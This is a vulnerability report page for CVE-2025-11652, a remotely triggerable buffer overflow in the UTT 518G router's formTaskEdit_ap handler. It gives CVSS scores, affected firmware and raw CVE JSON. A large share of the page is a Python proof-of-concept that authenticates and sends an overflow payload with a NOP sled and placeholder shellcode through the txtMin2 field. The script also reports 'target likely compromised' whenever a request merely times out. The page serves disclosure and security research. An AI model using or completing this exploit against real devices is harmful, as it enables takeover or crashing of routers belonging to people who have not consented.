Security Vulnerability Report
CVE-2025-11652 CVSS 8.8 HIGH

Published: 2025-10-13 01:15:48
Last Modified: 2026-01-08 17:59:15

Description

A vulnerability was found in UTT 进取 518G up to V3v3.2.7-210919-161313. This issue affects some unknown processing of the file /goform/formTaskEdit_ap. The manipulation of the argument txtMin2 results in buffer overflow. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:518g_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:utt:518g:3.0:*:*:*:*:*:*:* - NOT VULNERABLE
UTT 进取 518G <= V3v3.2.7-210919-161313

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-11652 - UTT 518G Buffer Overflow PoC
# Target: /goform/formTaskEdit_ap parameter txtMin2
# Author: Security Researcher
import requests
import sys

TARGET_URL = "http://TARGET_HOST"
LOGIN_URL = f"{TARGET_URL}/goform/login"
EXPLOIT_URL = f"{TARGET_URL}/goform/formTaskEdit_ap"

# Credentials (low privilege account required)
USERNAME = "user"
PASSWORD = "password"

def login(session, base_url):
    """Authenticate to the router web interface"""
    login_data = {
        "username": USERNAME,
        "password": PASSWORD,
        "submit": "Login"
    }
    resp = session.post(f"{base_url}/goform/login", data=login_data)
    return resp.status_code == 200

def exploit(session, base_url, payload):
    """Send buffer overflow payload via txtMin2 parameter"""
    data = {
        "txtMin2": payload,
        # Additional form parameters as needed
    }
    try:
        resp = session.post(f"{base_url}/goform/formTaskEdit_ap", data=data, timeout=10)
        return resp
    except requests.exceptions.RequestException as e:
        print(f"[+] Target may have crashed (expected): {e}")
        return None

def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    target = sys.argv[1]
    base_url = f"http://{target}"

    # Construct overflow payload (adjust offset as needed)
    # Typical buffer size ~256 bytes; adjust based on firmware analysis
    offset = 256
    # NOP sled + shellcode placeholder
    nop_sled = b"\x90" * 16
    # Replace with actual shellcode for target architecture (MIPS/ARM)
    shellcode = b"\xcc" * 64
    # Return address (little-endian, adjust based on stack analysis)
    ret_addr = b"\x41\x41\x41\x41"
    payload = b"A" * offset + ret_addr + nop_sled + shellcode

    session = requests.Session()
    print(f"[*] Authenticating to {target}...")
    if not login(session, base_url):
        print("[-] Login failed. Check credentials.")
        sys.exit(1)
    print("[+] Authentication successful")

    print(f"[*] Sending buffer overflow payload to txtMin2...")
    result = exploit(session, base_url, payload)
    if result is None:
        print("[+] Exploit completed - target likely compromised")
    else:
        print(f"[*] Response status: {result.status_code}")
        print("[+] Exploit sent successfully")

if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11652", "sourceIdentifier": "[email protected]", "published": "2025-10-13T01:15:47.957", "lastModified": "2026-01-08T17:59:14.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in UTT 进取 518G up to V3v3.2.7-210919-161313. This issue affects some unknown processing of the file /goform/formTaskEdit_ap. The manipulation of the argument txtMin2 results in buffer overflow. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:518g_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2.7-210919-161313", "matchCriteriaId": "9D83D3FD-34F4-4FBE-A83A-99AA21B91450"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:518g:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "4BADC9D6-20DE-466B-AEC1-278B8CC49BEC"}]}]}], "references": [{"url": "https://github.com/cymiao1978/cve/blob/main/14.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/14.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328069", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328069", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664926", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/14.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/14.md#poc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}